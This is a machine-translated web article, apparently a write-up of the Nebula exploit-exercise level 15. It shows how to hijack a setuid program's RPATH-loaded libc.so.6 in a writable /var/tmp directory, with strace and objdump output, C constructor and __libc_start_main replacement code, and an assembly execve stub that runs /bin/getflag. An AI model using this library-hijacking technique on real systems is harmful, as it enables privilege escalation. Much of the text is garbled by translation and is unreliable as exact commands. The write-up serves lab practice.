Home > Developer > Linux

dynamic-link libraries under Linux contain vulnerabilities

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

    1. Description

Nebula is a virtual machine for Linux to exploit the vulnerability exercise, and its 15th Level15 provides such a vulnerable program FLAG15

sh-4.2$ ls-ltotal 7-rwsr-x---1 flag15 level15 7161 2011-11-20 21:22 flag15sh-4.2$ whoamilevel15

The SETUID program is required to exploit the vulnerability, from user level15 to User flag15, execute/bin/getflag.

2. Vulnerability Mining

This problem is a classic dynamic link library hijacking topic, first with strace observation flag15

Execve ("./flag15",  ["./flag15"], [/* 19 vars */])  = 0brk (0)                                     = 0x880e000access ("/ Etc/ld.so.nohwcap ",  F_OK)       = -1 ENOENT  (No such  file or directory) 5/i686/sse2/cmov/libc.so.6 ",  o_rdonly)  = -1 ENOENT  (no such file or directory) Stat64 ("/var/tmp/flag15/i686/sse2/cmov",  0xbfe0f594)   = -1 enoent  (no such file or directory) Open ("/var/tmp/flag15/i686/sse2/ Libc.so.6 ",  o_rdonly)  = -1 ENOENT  (no such file or directory) Stat64 ("/var/tmp/flag15/i686/sse2",  0xbfe0f594)  = -1 ENOENT  (no such file  or directory) Open ("/Var/tmp/flag15/i686/cmov/libc.so.6 ",  o_rdonly)  = -1 ENOENT  (no such file  or directory) Stat64 ("/var/tmp/flag15/i686/cmov",  0xbfe0f594)  = -1 ENOENT  ( no such file or directory) Open ("/var/tmp/flag15/i686/libc.so.6",  O_RDONLY)  =  -1 ENOENT  (no such file or directory) stat64 ("/var/tmp/flag15/i686",  0xbfe0f594)  = -1 ENOENT  (no such file or directory) Open ("/var/tmp/ Flag15/sse2/cmov/libc.so.6 ",  o_rdonly)  = -1 ENOENT  (no such file or  directory) Stat64 ("/var/tmp/flag15/sse2/cmov",  0xbfe0f594)  = -1 ENOENT  (no  such file or directory) Open ("/var/tmp/flag15/sse2/libc.so.6",  o_rdonly)  = -1  ENOENT  (no such file or directory) stat64 ("/var/tmp/flag15/sse2",  0xbfe0f594)  = -1 enoent  (No such file ...open ("/var/tmp/flag15/libc.so.6",  o_rdonly)  = 3...exit_ Group (                )           = ?

It is found that the program is linked to a dynamic link library named Libc.so.6, but the/var/tmp directory is writable for the current user (level15), so you can write a custom libc.so.6 in that directory for the program FLAG15 link


We looked further at Flag15 's header information and found that it did rely on lib.so.6 and compiled with Rpath, which indicates that FLAG15 searches for the path/var/tmp/flag15 that contains the dynamic link library at run time, and allows Setuid to execute (ld_ Preload compilation does not allow Setuid execution).

Sh-4.2$ objdump -p /home/flag15/flag15/home/flag15/flag15:     file  format elf32-i386Program Header:    PHDR off     0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2          filesz 0x00000120 memsz 0x00000120 flags r-x   interp off    0x00000154 vaddr 0x08048154 paddr 0x08048154  align 2**0         filesz 0x00000013 memsz  0x00000013 flags r--    load off    0x00000000  vaddr 0x08048000 paddr 0x08048000 align 2**12          filesz 0x000005d4 memsz 0x000005d4 flags r-x     load off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**12          filesz 0x00000108 memsz 0x00000110 flags  rw- DYNAMIC off    0x00000f20 vaddr 0x08049f20 paddr  0x08049f20 align 2**2         filesz 0x000000d0  memsz 0x000000d0 flags rw-    NOTE off     0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2          filesz 0x00000044 memsz 0x00000044 flags r--eh_frame  off    0x000004dc vaddr 0x080484dc paddr 0x080484dc align  2**2         filesz 0x00000034 memsz  0x00000034 flags r--   stack off    0x00000000 vaddr 0x00000000 paddr  0x00000000 align 2**2         filesz 0x00000000  memsz 0x00000000 flags rw-   RELRO off     0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**0          filesz 0x000000f4 memsz 0x000000f4 flags r--dynamic  Section:  NEEDED                libc.so.6  RPATH                 /var/tmp/flag15  INIT                  0x080482c0  FINI                  0x080484ac  gnu_hash              0x080481ac  STRTAB                0x0804821c  SYMTAB                0x080481cc  STRSZ                 0x0000005a  syment                0x00000010   DEBUG                 0x00000000  pltgot                0x08049ff4  PLTRELSZ              0x00000018  pltrel               0x00000011   Jmprel               0x080482a8   REL                   0x080482a0  RELSZ                 0x00000008  RELENT                0x00000008  VERNEED               0x08048280  VERNEEDNUM            0x00000001  VERSYM                0x08048276version references:  required  from libc.so.6:    0x0d696910 0x00 02 glibc_2.0

3. Exploit

The rest of the matter is to write our custom libc.so.6 in the/var/tmp/flag15 directory, hijack Flag15, power to run/bin/getflag.

The first thing to do is hook the function used by the FLAG15 runtime, here are two points to choose from. One is to declare your function through the GCC __attribute ((constructor)) modifier, which can be found in the Linux dynamic link library portal _init Functions before the function is completed, and the second is to add their own function in the int __libc_start_main function.

Use the first method of writing:

sh-4.2$ cat constructor.c #include <stdio.h>void __attribute ((constructor)) init () {System ("/bin/getflag");}

Compile

Gcc-shared-fpic-o libc.so.6 constructor.c


The second method of writing

sh-4.2$ cat shell.c #include <unistd.h>int __libc_start_main (int (*main) (int, char * *, char * *), int argc, char *ar GV, Void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {System ("/bin/getflag");}

Compile

Gcc-shared-fpic-o libc.so.6 SHELL.C

Get libc.so.6

And then execute

sh-4.2$/HOME/FLAG15/FLAG15/HOME/FLAG15/FLAG15:/var/tmp/flag15/libc.so.6:no version information available (required BY/HOME/FLAG15/FLAG15)/HOME/FLAG15/FLAG15:/var/tmp/flag15/libc.so.6:no version information available (required by/ var/tmp/flag15/libc.so.6)/HOME/FLAG15/FLAG15:/var/tmp/flag15/libc.so.6:no version information available (required by/var/tmp/flag15/libc.so.6)/home/flag15/flag15:relocation error:/var/tmp/flag15/libc.so.6:symbol __cxa_finalize , version glibc_2.1.3 not defined in file libc.so.6 with link time reference

It is suggested from the above that a _cxa_finalize function is missing, so the constructor.c or shell.c in both methods can be added

void __cxa_finalize (void) {return;}

Modify CONSTRUCTOR.C to contructor1.c, and then compile again

sh-4.2$ Gcc-shared-fpic-o libc.so.6 contructor1.c

And then execute

sh-4.2$/HOME/FLAG15/FLAG15/HOME/FLAG15/FLAG15:/var/tmp/flag15/libc.so.6:no version information available (required BY/HOME/FLAG15/FLAG15)/HOME/FLAG15/FLAG15:/var/tmp/flag15/libc.so.6:no version information available (required by/ var/tmp/flag15/libc.so.6)/home/flag15/flag15:relocation Error:/var/tmp/flag15/libc.so.6:symbol system, version glibc_2.0 not defined in file libc.so.6 with link time reference

The above hint also lacks the glibc version information. So we provide a version script to use at compile time

Continue compiling and executing

sh-4.2$ Cat version glibc_2.0 {};sh-4.2$ gcc-shared-fpic-o libc.so.6 contructor1.c-wl,--version-script=version sh- 4.2$/home/flag15/flag15/home/flag15/flag15:relocation Error:/var/tmp/flag15/libc.so.6:symbol system, Version GLIBC _2.0 not defined in file libc.so.6 with link time reference

There is still a hint of error, and the system function does not appear to be found. There are two ways to solve this, one is to compile the static link library to satisfy all the dependencies (why?), and the other is to write your own system functions in assembly language.

The first method:

sh-4.2$ gcc-fpic-shared-static-libgcc-wl,--version-script=version,-bstatic-o libc.so.6 contructor1.c sh-4.2$/home/ FLAG15/FLAG15 you has successfully executed Getflag on a target account/home/flag15/flag15:relocation error:/HOME/FLAG1 5/flag15:symbol __libc_start_main, version glibc_2.0 not defined in file libc.so.6 with link time reference


The second method:

sh-4.2$ cat shell.c  #include  <unistd.h>void  __cxa_finalize (void *d)  {}int __libc_start_main (int  (*main)   (Int, char  **, char **), int argc, char *argv, void  (*init)   (void),  void  (*fini)   (void), void  (*rtld_fini)   (void),  void *stack_end)   {      system ();} 
sh-4.2$ cat system.s.section. Text.globl Systemsystem:mov $getflag,%ebxxor%edx,%edxpush%edxpush%ebxmov%esp,%ecxmov $ One by one,%eax; EXECVE system calls int $0x80.section. Datagetflag:. ASCII "/bin/getflag\0" sh-4.2$ gcc-shared-fpic-o libc.so.6 Shell . C SYSTEM.S-WL,--version-script=version sh-4.2$/home/flag15/flag15 you had successfully executed Getflag on a target Account

Personally, the method of writing shellcode is easier to understand than the way the static link library compiles, and has not yet figured out why static linking can solve the system function.

Reference

www.pwntester.com/blog/2013/11/26/nebula-level15-write-up/

Https://github.com/1u4nx/Exploit-Exercises-Nebula

dynamic-link libraries under Linux contain vulnerabilities

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
js libraries nlp libraries cakephp contain cookies contain rfid vulnerabilities scada vulnerabilities cloudflare libraries

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More